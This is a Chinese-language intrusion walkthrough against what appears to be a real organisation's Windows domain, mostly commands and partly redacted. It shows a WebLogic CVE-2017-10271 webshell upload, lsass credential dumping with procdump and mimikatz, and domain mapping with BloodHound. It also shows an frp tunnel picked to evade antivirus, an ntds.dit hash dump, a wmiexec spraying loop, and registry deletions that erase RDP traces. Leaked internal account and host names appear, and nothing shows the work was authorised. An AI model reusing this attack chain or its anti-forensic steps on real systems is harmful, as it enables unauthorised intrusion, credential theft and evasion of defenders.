目标
https://www.xxx.com/en/
外围打点
通过子域名,找到分站:
https://www.xxx.com/
C段里面有一个安装Weblogic的服务器,CVE-2017-10271。
上传webshell。
http://xxx:xxxx//wls-wsat/xxx.jsp
内网渗透
主机信息收集
查看当前权限。
whoami
查看机器网卡情况。
ipconfig /all
-
存在域:xxx.local。
-
当前内网ip段:10.100.20.0/24.
查看当前机器是否出网。
ping www.google.com
查看当前主机是否存在杀软,也是个老牌杀软ESET NOD32,国外经常用这个,这次不用CS和MSF打。
查看当前机器安装的软件。
wmic product get name,version
不知道为什么没有回显,写入文件也没有。
查看当前机器的详细信息。
systeminfo
171个补丁。。。。。。
抓取密码,使用Prodump+mimikatz导出lsass.exe存储的密码,获得账号密码,看样子有大哥来过,修改过注册表,不然windows server 2021抓不到明文密码,我们再搞一遍。
PRINCHEALTH\psvadmin:xxxxx
PSVHR-APPPROD\oracle:xxxx
查看是否在域内。
net time /domain
域用户+域机器,舒服。
查看当前机器与其它机器建立的ipc连接。
net use
域信息收集
查看当前域管理员组,发现psvadmin为域管理员。
net group "Domain admins" /domain
查询信任域。
nltest /domain_trusts
-
pxxxxxxx.local为主域。
-
pxx.local为子域。
定位域控机器。
nltest /dclist:domainname
其中HWC-ADSRV-P01为主域控机器,但没有找到子域的域控。
查询主域控机器的ip地址。
ping HWC-ADSRV-P01
通过spn查询域pxxxxxxx.local结构。
setspn -T pxxxxxxx.local -Q */* >spn.txt
并统计域内主机数量,好家伙,3167台。
grep "CN=" spn.txt | awk -F "," {'print $1'} | awk -F "=" {'print $2'} > host.txt
spn看起来太麻烦了,所以使用ADExplorer连接域控机器并导出域结构,ADExplorerSnapshot.py转换json格式,并将其导入Bloodhound,进行可视化分析,3113台机器,4897个用户。
Bloodhound
当前用户是psvadmin,我们的目标是域控机器的最高权限,再Bloodhound中填入开始节点为psvadmin用户和目标节点为域控机器名,它会为我们规划出一条攻击路径。
攻击路径
我们可以看到psvadmin用户是域管理员组的一名成员,比较简单,所以直接可以登录域控机器。
隧道搭建
Neo-reGeorg、Venom都被杀,frp不杀,很奇怪,出网使用frp反向代理搭建隧道。
frpc
frps
SocksCap
域渗透
当前为C类ip段,Ladon扫描内网存活主机。
Ladon
隧道已经搭建好了,拥有域管理员psvadmin明文账号密码,直接远程登录主域控机器。
mstsc
接下来就是使用NTDSUTIL拍摄ntds.dit的快照,使用NTDSDumpEx导出该域用户的全部hash即可。
最后使用wmiexec进行密码喷洒即可。
FOR /F %i in (ip.txt) do wmiexec Pxxxxxxx/psvadmin:xxxxxxx@%i whoami
密码喷洒
到这里这个域基本被打穿。
权限维持
由于只是练习,就不作域权限维持了,可以制作黄金票据。
痕迹清理
远程登录了主域控机器:172.21.2.2。
清理3389日志。
//删除注册表
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
